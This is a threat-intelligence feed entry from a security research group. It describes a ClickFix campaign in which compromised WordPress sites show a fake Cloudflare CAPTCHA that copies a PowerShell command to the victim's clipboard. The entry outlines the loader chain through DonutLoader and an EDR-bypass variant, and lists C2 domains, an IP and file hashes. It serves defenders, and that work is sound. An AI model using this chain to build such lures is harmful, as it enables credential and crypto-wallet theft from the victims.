← Back to Pulse Feed
PULSE DETAIL
PULSE NAME
ClickFix-as-a-Service platform with fake Cloudflare CAPTCHA using compromised WordPress sites using a DOM overlay
WHITE dispensight 2026-05-20 Modified: 2026-05-20
105
IOCs
HIGH VOLUME
TLP:GREEN | SL-ADV-2026-WP-001 UNIFIED March 20 – May 19, 2026 ClickFix/TDS cluster active since March 2026. Compromised WordPress sites inject an obfuscated JS loader that fires a synchronous XHR to a TDS C2 (ntdnewtds.shop / dnsnewtds.shop / sdntds.shop), fetches a remote payload, and executes it inline. Victims see a fake Cloudflare CAPTCHA (Shadow DOM, 50-language localized) that silently writes a PowerShell command to clipboard. PS chain: IRM stage1 → IWR stage2 → csc.exe compiles Rozena DLL → svchost injection → DonutLoader C2 (158.94.208.104) → browser/Firefox/crypto wallet credential theft → self-delete. Parallel Python chain (Protected.py) uses direct NT syscalls for EDR bypass. Per-campaign C2 IPs, segmented DonutLoader payloads (my_ / student_), and a 6-domain TDS pool suggest a ClickFix-as-a-Service affiliate platform. 4 JS variants documented March–May 2026. SecureLeaf · Dispensight Security Research · SL-ADV-2026-WP-001 rev. 3.0 STIX 2.1 · 438 objects · 4 variants · 2 execution chains
clickfixevasionDonutLoaderTR.Rozena.geninfostealerprotected.pyAS202412iexinjectordropper
MITRE ATT&CK & Malware Families
ATT&CK TECHNIQUES
MALWARE FAMILIES
Donutloader TR/Rozena.Gen
Indicators of Compromise (11 / 105 total)
All CIDR FileHash-MD5 FileHash-SHA1 FileHash-SHA256 IPv4 URL domain hostname
TYPEINDICATORDESCRIPTIONCREATED
FileHash-SHA256 1d9d37f90fa60b93647a845ff39f64ff7e7f71f6f2a576780fbe974064a907b1 2026-05-20
FileHash-SHA256 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810 SHA256 of 724a8445c5c3fd57778d82f62b9d4a6112a3bb2d 2026-05-20
FileHash-SHA256 2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896 2026-05-20
FileHash-SHA256 339e0e018b48a118c36c0b7181b143c255ebad19c5f628a1a57903592f07df94 2026-05-20
FileHash-SHA256 4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5 2026-05-20
FileHash-SHA256 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 2026-05-20
FileHash-SHA256 6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d 2026-05-20
FileHash-SHA256 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9 SHA256 of f1542a7697e04865e1dfeeed084e5ea5870100f0 2026-05-20
FileHash-SHA256 b04f539c7bbb9133d2f801bfce73ec84ad3cc33768685ca415113f622db90168 2026-05-20
FileHash-SHA256 b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937 2026-05-20
FileHash-SHA256 ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff 2026-05-20
References (2)
↗ STIX.json ↗ https://secureleaf.dispensight.com/sink.html